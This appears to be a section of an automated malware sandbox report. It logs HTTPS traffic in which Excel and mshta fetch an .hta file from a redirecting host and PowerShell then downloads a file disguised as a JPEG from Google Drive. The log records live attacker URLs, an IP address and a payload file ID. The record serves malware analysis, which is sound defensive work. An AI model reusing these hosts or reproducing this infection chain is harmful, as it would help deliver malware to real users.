Oct 25, 2024 19:52:37.677767038 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49163	188.114.97.3	443	3556	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
2024-10-25 17:50:44 UTC	445	OUT	GET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: qrisni.me Connection: Keep-Alive
2024-10-25 17:50:45 UTC	1209	IN	HTTP/1.1 302 Found Date: Fri, 25 Oct 2024 17:50:45 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 97 Connection: close cross-origin-embedder-policy: require-corp cross-origin-opener-policy: same-origin cross-origin-resource-policy: same-origin x-dns-prefetch-control: off x-frame-options: SAMEORIGIN strict-transport-security: max-age=15552000; includeSubDomains x-download-options: noopen x-content-type-options: nosniff origin-agent-cluster: ?1 x-permitted-cross-domain-policies: none referrer-policy: no-referrer x-xss-protection: 0 location: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta vary: Accept, Accept-Encoding x-do-app-origin: edb1517e-eb68-4bff-8694-91662c34bef1 Cache-Control: private x-do-orig-status: 302 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q8mcip6UsF2EHp9TurA4twd%2BWNBeUfqJLIKpvXEWlEglG3awiVUfWhkSQkBFs9h13BnQmqKR8UJ0CgkfoOLPI%2FNrGZUH5w6nUHmDm3RJ3%2FiyweCF5KCQrm090BQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d840cfb6a828c58-DFW alt-svc: h3=":443"; ma=86400
2024-10-25 17:50:45 UTC	190	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 34 32 30 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 30 38 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 32 37 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 30 39 38 35 35 30 26 63 77 6e 64 3d 33 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 66 35 62 34 62 39 32 34 62 64 39 33 32 36 31 31 26 74 73 3d 39 35 36 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1420&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2808&recv_bytes=1027&delivery_rate=2098550&cwnd=32&unsent_bytes=0&cid=f5b4b924bd932611&ts=956&x=0"
2024-10-25 17:50:45 UTC	97	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 37 36 2e 31 34 31 2f 34 31 2f 63 65 2f 67 72 65 61 74 74 68 69 6e 67 73 77 69 74 68 67 6f 6f 64 6e 65 77 73 67 69 76 65 6e 62 79 67 6f 64 74 68 69 6e 67 73 67 72 65 61 74 2e 68 74 61 Data Ascii: Found. Redirecting to http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49165	188.114.97.3	443	3848	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 17:50:47 UTC	469	OUT	GET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1 Accept: / Accept-Language: fr-FR UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: qrisni.me Connection: Keep-Alive
2024-10-25 17:50:48 UTC	1207	IN	HTTP/1.1 302 Found Date: Fri, 25 Oct 2024 17:50:48 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 97 Connection: close cross-origin-embedder-policy: require-corp cross-origin-opener-policy: same-origin cross-origin-resource-policy: same-origin x-dns-prefetch-control: off x-frame-options: SAMEORIGIN strict-transport-security: max-age=15552000; includeSubDomains x-download-options: noopen x-content-type-options: nosniff origin-agent-cluster: ?1 x-permitted-cross-domain-policies: none referrer-policy: no-referrer x-xss-protection: 0 location: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta vary: Accept, Accept-Encoding x-do-app-origin: edb1517e-eb68-4bff-8694-91662c34bef1 Cache-Control: private x-do-orig-status: 302 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cAmjc6O2M2jxub4VsQsb4hSUbnDKN7f78bcbNAnr2Wwhtl%2BZV7T9S2FGKm8P7LAETyDZDAOAKJBBRTN%2FDsSZEjj5B8AYiJ8dNxRWTm3fQ1FFK1ZBJmIwevOYx8g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d840d0e48e06c54-DFW alt-svc: h3=":443"; ma=86400
2024-10-25 17:50:48 UTC	190	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 39 39 35 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 30 39 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 35 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 36 38 33 39 36 36 26 63 77 6e 64 3d 32 35 30 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 63 66 64 66 33 30 63 66 61 30 36 63 63 62 38 35 26 74 73 3d 35 31 38 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=995&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2809&recv_bytes=1051&delivery_rate=2683966&cwnd=250&unsent_bytes=0&cid=cfdf30cfa06ccb85&ts=518&x=0"
2024-10-25 17:50:48 UTC	97	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 37 36 2e 31 34 31 2f 34 31 2f 63 65 2f 67 72 65 61 74 74 68 69 6e 67 73 77 69 74 68 67 6f 6f 64 6e 65 77 73 67 69 76 65 6e 62 79 67 6f 64 74 68 69 6e 67 73 67 72 65 61 74 2e 68 74 61 Data Ascii: Found. Redirecting to http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49167	188.114.97.3	443	3556	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
2024-10-25 17:51:05 UTC	445	OUT	GET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: qrisni.me Connection: Keep-Alive
2024-10-25 17:51:05 UTC	1209	IN	HTTP/1.1 302 Found Date: Fri, 25 Oct 2024 17:51:05 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 97 Connection: close cross-origin-embedder-policy: require-corp cross-origin-opener-policy: same-origin cross-origin-resource-policy: same-origin x-dns-prefetch-control: off x-frame-options: SAMEORIGIN strict-transport-security: max-age=15552000; includeSubDomains x-download-options: noopen x-content-type-options: nosniff origin-agent-cluster: ?1 x-permitted-cross-domain-policies: none referrer-policy: no-referrer x-xss-protection: 0 location: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta vary: Accept, Accept-Encoding x-do-app-origin: edb1517e-eb68-4bff-8694-91662c34bef1 Cache-Control: private x-do-orig-status: 302 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yke%2ForfWSVDFbw%2FPZip4aERFALHtNiQfgQz2qPe283BRV1LRB1IID1nDfJ8G8w1qsnq5eeK1qQpLSbuf1Bu1Fq0i2%2Bw7q4izlTM7hwLgz08A9HB2c0n7VD73Ji4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d840d799a286c33-DFW alt-svc: h3=":443"; ma=86400
2024-10-25 17:51:05 UTC	191	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 32 39 35 26 73 65 6e 74 3d 34 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 30 38 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 32 37 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 32 34 34 39 36 31 26 63 77 6e 64 3d 32 35 31 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 31 36 36 34 62 36 30 38 32 35 35 36 61 36 33 38 26 74 73 3d 34 33 38 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1295&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2808&recv_bytes=1027&delivery_rate=2244961&cwnd=251&unsent_bytes=0&cid=1664b6082556a638&ts=438&x=0"
2024-10-25 17:51:05 UTC	97	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 37 36 2e 31 34 31 2f 34 31 2f 63 65 2f 67 72 65 61 74 74 68 69 6e 67 73 77 69 74 68 67 6f 6f 64 6e 65 77 73 67 69 76 65 6e 62 79 67 6f 64 74 68 69 6e 67 73 67 72 65 61 74 2e 68 74 61 Data Ascii: Found. Redirecting to http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49169	188.114.97.3	443	3164	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 17:51:07 UTC	469	OUT	GET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1 Accept: / Accept-Language: fr-FR UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: qrisni.me Connection: Keep-Alive
2024-10-25 17:51:08 UTC	1213	IN	HTTP/1.1 302 Found Date: Fri, 25 Oct 2024 17:51:08 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 97 Connection: close cross-origin-embedder-policy: require-corp cross-origin-opener-policy: same-origin cross-origin-resource-policy: same-origin x-dns-prefetch-control: off x-frame-options: SAMEORIGIN strict-transport-security: max-age=15552000; includeSubDomains x-download-options: noopen x-content-type-options: nosniff origin-agent-cluster: ?1 x-permitted-cross-domain-policies: none referrer-policy: no-referrer x-xss-protection: 0 location: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta vary: Accept, Accept-Encoding x-do-app-origin: edb1517e-eb68-4bff-8694-91662c34bef1 Cache-Control: private x-do-orig-status: 302 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V6b4DaVWmI5g15AuW5XVj74%2Bwoh%2FrAVD91DYBEEWy56203550S5dRtz2Y%2BVeqOaMtCIljRlX1%2B4fPJVaQCQARtkzG3eNAO9DtdP0QFHTSUwWyjRZeZn21i%2BAxi0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d840d8addb66b37-DFW alt-svc: h3=":443"; ma=86400
2024-10-25 17:51:08 UTC	191	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 32 32 36 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 30 39 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 35 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 33 39 37 33 35 30 26 63 77 6e 64 3d 32 35 31 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 39 33 62 63 37 38 35 65 33 34 30 65 39 61 38 30 26 74 73 3d 35 33 31 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1226&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2809&recv_bytes=1051&delivery_rate=2397350&cwnd=251&unsent_bytes=0&cid=93bc785e340e9a80&ts=531&x=0"
2024-10-25 17:51:08 UTC	97	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 37 36 2e 31 34 31 2f 34 31 2f 63 65 2f 67 72 65 61 74 74 68 69 6e 67 73 77 69 74 68 67 6f 6f 64 6e 65 77 73 67 69 76 65 6e 62 79 67 6f 64 74 68 69 6e 67 73 67 72 65 61 74 2e 68 74 61 Data Ascii: Found. Redirecting to http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49173	142.250.186.46	443	3804	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 17:51:27 UTC	121	OUT	GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1 Host: drive.google.com Connection: Keep-Alive
2024-10-25 17:51:27 UTC	1319	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 25 Oct 2024 17:51:27 GMT Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'report-sample' 'nonce-k9tZW3rNiYGbxdzwuxB-ag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49174	142.250.186.161	443	3804	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 17:51:28 UTC	139	OUT	GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1 Host: drive.usercontent.google.com Connection: Keep-Alive
2024-10-25 17:51:32 UTC	4906	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="new_image-new.jpg" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 2239109 Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT X-GUploader-UploadID: AHmUCY0bmver0urvuxuzo9AdFT_IHz9bwApl778Vv9migfC6rozgTz00TWakirW8DoJgkjup23XFYijIkg Date: Fri, 25 Oct 2024 17:51:32 GMT Expires: Fri, 25 Oct 2024 17:51:32 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=WqxmdA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-25 17:51:32 UTC	4906	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-10-25 17:51:32 UTC	4887	IN	Data Raw: 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9 cd 04 62 f1 19 03 ed 55 b5 34 6c 13 99 53 48 aa 43 28 23 68 01 89 e7 9c 98 27 46 81 d1 49 00 1d c6 fb 9c 07 6f 7c 8a 24 76 64 ec a4 5e 15 62 d3 c0 8c e5 e5 24 03 e9 02 c5 62 1a 6d 62 bb 00 cc 14 ad 81 78 71 36 e4 61 be af 8c 0c ad 42 99 26 76 51 44 9a 0a 16 b8 c5 99 19 0d 32 90 7e 23 35 a4 11 b3 15 27 e2 0f 4b e3 17 d4 ed 10 80 24 dc 4f 40 70 33 eb Data Ascii: 8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo\|$vd^b$bmbxq6aB&vQD2~#5'K$O@p3
2024-10-25 17:51:32 UTC	1378	IN	Data Raw: 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 e5 81 e9 07 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3 17 91 43 33 12 d4 7f 11 ba e7 b6 2e 18 b2 d8 8c 00 bf e2 16 0e 06 be b7 c5 22 62 a9 1e 8e 28 db 68 66 23 78 Data Ascii: #k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*@g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(hf#x
2024-10-25 17:51:32 UTC	1378	IN	Data Raw: 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a ea 53 53 2c 72 6d 0a b1 86 20 1e 7a fe 59 89 11 d7 6a 17 64 26 79 1a e8 90 cc 76 df c7 a0 ca b3 a3 43 24 b3 6a 7f 7b c0 45 ae 4d 77 bf 6c 67 c3 5e 72 fb 20 75 60 80 ca 55 ba 13 44 1f e7 81 53 a2 f1 b4 86 49 8c b3 20 4e 4a 89 da c8 fa 1c 57 45 ac f1 1d 44 a4 c5 aa 76 65 e4 2b 4a 7a 7d 78 cf 68 ed fb a6 b5 05 45 92 08 be 9c e7 90 d7 c4 9a 5f 11 d4 84 04 02 4b 75 e3 91 ed 81 a1 a2 fb 43 18 3e 5e b2 44 0f c8 de 08 02 fe 20 74 cd 5d 3c cb aa Data Ascii: @p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{SS,rm zYjd&yvC$j{EMwlg^r u`UDSI NJWEDve+Jz}xhE_KuC>^D t]<
2024-10-25 17:51:32 UTC	1378	IN	Data Raw: 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 78 ee 01 6e c3 a6 0b f6 84 1a 2f da f4 cd 33 8d 41 69 34 c7 72 a8 51 b7 62 71 ed d3 bf 7b be 3a 66 ef d9 08 53 67 da 44 1a 69 62 f1 18 b4 4e 93 ab 23 16 45 43 10 29 60 05 03 d2 d4 a0 0a af 86 64 7d b5 d6 e9 b5 bf b4 81 3b 23 16 94 69 24 01 db 90 1a 28 d8 0e bf 1c 0d 1f da cc fe 54 1f 66 56 3d cb 1f fb 35 76 ad 81 43 8f fa 67 cc c3 ea a2 5b d3 06 21 bd 54 05 fe b9 f5 2f da 8c 48 e3 ec f0 92 2d 81 7c 35 00 66 61 46 b6 f4 e7 3c 34 12 c7 b4 Data Ascii: '6Xi50X~?G6OBwV)\|jXmsf9 `we!6q{PG\|$iar_LNb#xn/3Ai4rQbq{:fSgDibN#EC)`d};#i$(TfV=5vCg[!T/H-\|5faF<4
2024-10-25 17:51:32 UTC	1378	IN	Data Raw: c3 29 58 5a 9c d9 3e 9f 96 1e 08 8c b0 82 dc af 42 47 38 19 e1 37 37 ac 6e 1e f8 64 2c ea 50 8b 5a e2 86 72 43 20 d6 98 ca 91 10 e6 f1 98 e2 02 56 0a 59 42 8b 23 df 01 78 b4 e9 01 ad a6 db b0 c3 47 a2 56 90 52 30 0d d6 fb 64 88 77 4d bc c8 dc 9e 06 3a 6d 23 01 59 b7 11 d7 02 87 46 9a 6b 23 93 d3 e9 81 56 57 0c 03 58 06 a8 8e 70 da 98 8b 4d 13 09 58 9a a2 07 f3 c4 91 36 ea 25 46 91 89 bf 4f 15 81 05 48 73 66 fe 99 59 d0 32 6d 65 e4 64 32 32 cc 41 73 f0 bc ba 5b 0d 92 1b 61 d0 d6 02 fa 7d 3a 39 3e 9f 52 f4 38 dc 6b 21 43 bb a8 e9 95 8c 04 52 43 10 df 2c 32 12 50 6d 66 2c 7a fc 30 2f 06 8d a6 25 a4 34 3b 58 c8 96 22 d1 f4 52 cb c0 ac d4 44 56 45 f2 d8 8f 46 d3 f1 f8 e6 63 11 a7 d4 37 3c 01 54 7b e0 0e 5d b1 bd 58 06 85 71 f0 c3 94 4f ba 05 25 43 37 3d 31 49 Data Ascii: )XZ>BG877nd,PZrC VYB#xGVR0dwM:m#YFk#VWXpMX6%FOHsfY2med22As[a}:9>R8k!CRC,2Pmf,z0/%4;X"RDVEFc7<T{]XqO%C7=1I
